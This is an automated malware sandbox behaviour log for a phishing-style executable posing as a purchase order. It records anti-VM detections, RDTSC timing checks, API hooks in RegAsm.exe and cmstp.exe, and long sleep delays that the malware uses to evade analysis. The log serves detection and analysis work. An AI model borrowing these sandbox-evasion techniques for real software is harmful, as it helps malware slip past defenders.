Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: PURCHASED ORDER OF ENG091.exe PID: 3472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PURCHASED ORDER OF ENG091.pif PID: 5728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PURCHASED ORDER OF ENG091.pif PID: 4872, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PURCHASED ORDER OF ENG091.pif.pif PID: 3004, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PURCHASED ORDER OF ENG091.pif.pif PID: 3924, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PURCHASED ORDER OF ENG091.pif.pif.pif PID: 5128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PURCHASED ORDER OF ENG091.pif.pif.pif PID: 2264, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PURCHASED ORDER OF ENG091.pif.pif.pif.pif PID: 2704, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PURCHASED ORDER OF ENG091.pif.pif.pif.pif PID: 6648, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API/Special instruction interceptor: Address: 7FFDB4430774
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API/Special instruction interceptor: Address: 7FFDB442D8A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API/Special instruction interceptor: Address: 7FFDB442DA44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\cmstp.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\cmstp.exe	API/Special instruction interceptor: Address: 7FFDB4430774
Source: C:\Windows\SysWOW64\cmstp.exe	API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\cmstp.exe	API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\cmstp.exe	API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\cmstp.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\cmstp.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\cmstp.exe	API/Special instruction interceptor: Address: 7FFDB442D8A4
Source: C:\Windows\SysWOW64\cmstp.exe	API/Special instruction interceptor: Address: 7FFDB442DA44

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe	RDTSC instruction interceptor: First address: 28B9904 second address: 28B990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe	RDTSC instruction interceptor: First address: 28B9B7E second address: 28B9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe	RDTSC instruction interceptor: First address: 2ED9904 second address: 2ED990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe	RDTSC instruction interceptor: First address: 2ED9B7E second address: 2ED9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe	RDTSC instruction interceptor: First address: 6E9904 second address: 6E990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe	RDTSC instruction interceptor: First address: 6E9B7E second address: 6E9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe	RDTSC instruction interceptor: First address: B39904 second address: B3990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe	RDTSC instruction interceptor: First address: B39B7E second address: B39B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 2C09904 second address: 2C0990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 2C09B7E second address: 2C09B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe	RDTSC instruction interceptor: First address: 609904 second address: 60990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe	RDTSC instruction interceptor: First address: 609B7E second address: 609B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe	RDTSC instruction interceptor: First address: 969904 second address: 96990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe	RDTSC instruction interceptor: First address: 969B7E second address: 969B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe	RDTSC instruction interceptor: First address: 5079904 second address: 507990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe	RDTSC instruction interceptor: First address: 5079B7E second address: 5079B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 3199904 second address: 319990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 3199B7E second address: 3199B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Memory allocated: A60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Memory allocated: 27B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Memory allocated: DE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Memory allocated: B80000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Memory allocated: 2700000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Memory allocated: B80000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Memory allocated: 710000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Memory allocated: 2280000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Memory allocated: 21B0000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Memory allocated: 840000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Memory allocated: 2350000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Memory allocated: 2290000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Memory allocated: 2B10000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Memory allocated: 2CA0000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Memory allocated: 4CA0000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Memory allocated: 2AC0000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Memory allocated: 2D80000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Memory allocated: 2AC0000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Memory allocated: 17B0000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Memory allocated: 3290000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Memory allocated: 5290000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Memory allocated: 26F0000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Memory allocated: 2910000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Memory allocated: 4910000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Memory allocated: 3110000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Memory allocated: 3310000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Memory allocated: 3110000 memory reserve \| memory write watch

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 7_2_00409AB0 rdtsc

7_2_00409AB0

Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Thread delayed: delay time: 922337203685477

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 9473	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 459	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 525	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Window / User API: threadDelayed 7174	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Window / User API: threadDelayed 2797	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API coverage: 1.6 %

Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe TID: 1292	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe TID: 2264	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4344	Thread sleep time: -18946000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4344	Thread sleep time: -918000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe TID: 4876	Thread sleep count: 7174 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe TID: 4876	Thread sleep time: -14348000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe TID: 4876	Thread sleep count: 2797 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe TID: 4876	Thread sleep time: -5594000s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif TID: 5956	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif TID: 7164	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif TID: 6628	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif TID: 3564	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif TID: 5332	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif TID: 3632	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif TID: 2308	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif TID: 2420	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif TID: 4884	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif TID: 4200	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif TID: 6244	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif TID: 3960	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif TID: 7072	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif TID: 6740	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif TID: 5696	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif TID: 6492	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmstp.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmstp.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Thread delayed: delay time: 922337203685477

Source: explorer.exe, 00000008.00000002.3377674269.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2185822168.000000000962B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
Source: explorer.exe, 00000008.00000002.3377674269.00000000097F3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000008.00000002.3377674269.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2185822168.000000000973C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWws
Source: PURCHASED ORDER OF ENG091.pif, 00000015.00000002.2401595350.0000000000808000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
Source: explorer.exe, 00000008.00000003.2979140509.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
Source: explorer.exe, 00000008.00000002.3377674269.0000000009605000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: explorer.exe, 00000008.00000000.2192292885.000000000C474000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: &me#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94
Source: explorer.exe, 00000008.00000000.2175448069.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.2185822168.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3377674269.000000000978C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000008.00000000.2175448069.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
Source: PURCHASED ORDER OF ENG091.pif.pif.pif.pif, 00000047.00000002.2991343791.000000000146B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllF
Source: explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000008.00000003.2979140509.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
Source: PURCHASED ORDER OF ENG091.pif.pif.pif, 00000036.00000002.2781754362.00000000014B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,
Source: explorer.exe, 00000008.00000000.2175448069.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: PURCHASED ORDER OF ENG091.exe, 00000000.00000002.2173848112.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif, 0000000C.00000002.2326904554.000000000073D000.00000004.00000020.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif, 0000001D.00000002.2491782208.00000000005A5000.00000004.00000020.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif, 00000026.00000002.2612117214.0000000001234000.00000004.00000020.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif.pif, 0000002E.00000002.2696733551.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif.pif.pif, 0000003F.00000002.2862373835.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 00000008.00000003.2979140509.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 00000008.00000000.2175448069.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

